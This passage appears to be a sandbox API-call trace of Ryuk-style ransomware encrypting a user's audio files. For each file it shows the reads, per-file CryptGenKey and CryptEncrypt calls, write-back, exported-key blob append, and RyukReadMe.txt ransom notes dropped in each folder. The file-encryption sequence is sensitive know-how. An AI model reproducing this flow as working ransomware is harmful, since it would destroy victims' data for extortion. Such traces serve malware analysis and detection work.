lpDistanceToMoveHigh=0x0) returned 0x0 [0157.044] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.044] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.045] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.045] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdc5d, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xdc5d, lpOverlapped=0x0) returned 1 [0157.046] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.046] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xdc5d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xdc60) returned 1 [0157.046] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.046] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdc60, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xdc60, lpOverlapped=0x0) returned 1 [0157.047] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.047] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.047] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.047] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.047] CloseHandle (hObject=0x194) returned 1 [0157.067] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.072] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.072] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.072] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.072] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0157.073] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\nc_IkcAbbCeWRR2.m4a", dwFileAttributes=0x80) returned 1 [0157.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\nc_IkcAbbCeWRR2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\r6ew1glki83p\\nc_ikcabbcewrr2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0157.073] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=24781) returned 1 [0157.073] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=24781) returned 1 [0157.073] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x5fab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.073] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.074] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.074] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.074] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.074] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.074] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x60cd, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x60cd, lpOverlapped=0x0) returned 1 [0157.075] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.075] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x60cd, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x60d0) returned 1 [0157.075] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.075] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x60d0, lpOverlapped=0x0) returned 1 [0157.075] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.076] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.076] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.076] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.076] CloseHandle (hObject=0x194) returned 1 [0157.093] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.097] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.097] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.097] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.097] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0157.097] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\Q4w1nuO4iU9.m4a", dwFileAttributes=0x80) returned 1 [0157.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\Q4w1nuO4iU9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\r6ew1glki83p\\q4w1nuo4iu9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0157.098] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=20800) returned 1 [0157.098] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=20800) returned 1 [0157.098] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x501e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.098] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.099] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.099] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.099] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.099] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.099] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5140, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x5140, lpOverlapped=0x0) returned 1 [0157.099] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.099] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x5140, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x5150) returned 1 [0157.099] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.100] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5150, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x5150, lpOverlapped=0x0) returned 1 [0157.100] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.100] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.100] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.100] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.100] CloseHandle (hObject=0x194) returned 1 [0157.119] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.123] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.123] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.123] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.123] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0157.124] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\xEM-MaXvw.wav", dwFileAttributes=0x80) returned 1 [0157.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\xEM-MaXvw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\r6ew1glki83p\\xem-maxvw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0157.124] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=76791) returned 1 [0157.124] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=76791) returned 1 [0157.124] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x12ad5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.124] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.125] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.125] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.125] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.125] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.125] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12bf7, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x12bf7, lpOverlapped=0x0) returned 1 [0157.126] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.126] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x12bf7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x12c00) returned 1 [0157.127] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.127] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12c00, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x12c00, lpOverlapped=0x0) returned 1 [0157.127] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.127] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.127] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.127] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.127] CloseHandle (hObject=0x194) returned 1 [0157.145] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.149] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.149] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.149] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0157.149] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0157.149] SetLastError (dwErrCode=0x0) [0157.149] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\R6eW1GlkI83p\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\r6ew1glki83p\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.150] GetLastError () returned 0x0 [0157.150] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0157.151] CloseHandle (hObject=0x190) returned 1 [0157.151] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.151] SetLastError (dwErrCode=0x0) [0157.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.151] GetLastError () returned 0xb7 [0157.151] CloseHandle (hObject=0x190) returned 1 [0157.151] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0157.151] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.151] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.151] SetLastError (dwErrCode=0x0) [0157.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.273] GetLastError () returned 0x0 [0157.273] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0157.274] CloseHandle (hObject=0xe4) returned 1 [0157.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0157.274] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.274] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.274] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.274] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\-3 DLyO_nCU.wav", dwFileAttributes=0x80) returned 1 [0157.274] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\-3 DLyO_nCU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\c6fejv\\-3 dlyo_ncu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0157.275] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=48880) returned 1 [0157.275] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=48880) returned 1 [0157.275] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xbdce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.275] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0157.275] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.275] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0157.275] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.276] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.276] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xbef0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xbef0, lpOverlapped=0x0) returned 1 [0157.276] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0157.276] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xbef0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xbf00) returned 1 [0157.277] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.277] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbf00, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xbf00, lpOverlapped=0x0) returned 1 [0157.277] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0157.277] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.277] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.277] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0157.277] CloseHandle (hObject=0xd4) returned 1 [0157.304] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.308] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.308] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.308] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.308] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.309] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\heq27f2TQDOJ.mp3", dwFileAttributes=0x80) returned 1 [0157.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\heq27f2TQDOJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js 